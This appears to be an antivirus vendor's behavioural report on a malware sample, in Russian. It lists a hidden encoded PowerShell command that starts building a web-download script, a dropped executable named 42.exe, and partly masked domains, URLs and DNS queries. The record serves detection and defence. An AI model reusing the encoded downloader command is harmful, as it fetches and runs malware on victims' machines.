Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHADAAXwA4AF8AMwA9ACgAJwBsAF8ANQAnACsAJwBfADcANwA2ACcAKQA7ACQAUAAwAF8ANgA1ADAAXwA5AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEQAXwA3ADMAMQA1AD0AKAAnAGgAdAB0AH...
- %HOMEPATH%\42.exe
- %HOMEPATH%\42.exe
- 'id##n.com':80
- 'co######tiondistrict.com':80
- 'co######tiondistrict.com':443
- 'bs###tage.com':80
- http://id##n.com/VFRvAVWyF8
- http://co######tiondistrict.com/zA0jHm2vt
- http://www.bs###tage.com/MofXXfVq
- http://ww##.#spartage.com/MofXXfVq?su#########################################
- 'co######tiondistrict.com':443
- DNS ASK id##n.com
- DNS ASK co######tiondistrict.com
- DNS ASK bs###tage.com
- DNS ASK ww##.#spartage.com
- DNS ASK ad##-ch.com
- DNS ASK ga#####kolash.com.ve
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHADAAXwA4AF8AMwA9ACgAJwBsAF8ANQAnACsAJwBfADcANwA2ACcAKQA7ACQAUAAwAF8ANgA1ADAAXwA5AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEQAXwA3ADMAMQA1AD0AKAAnAGgAdAB0AH...' (со скрытым окном)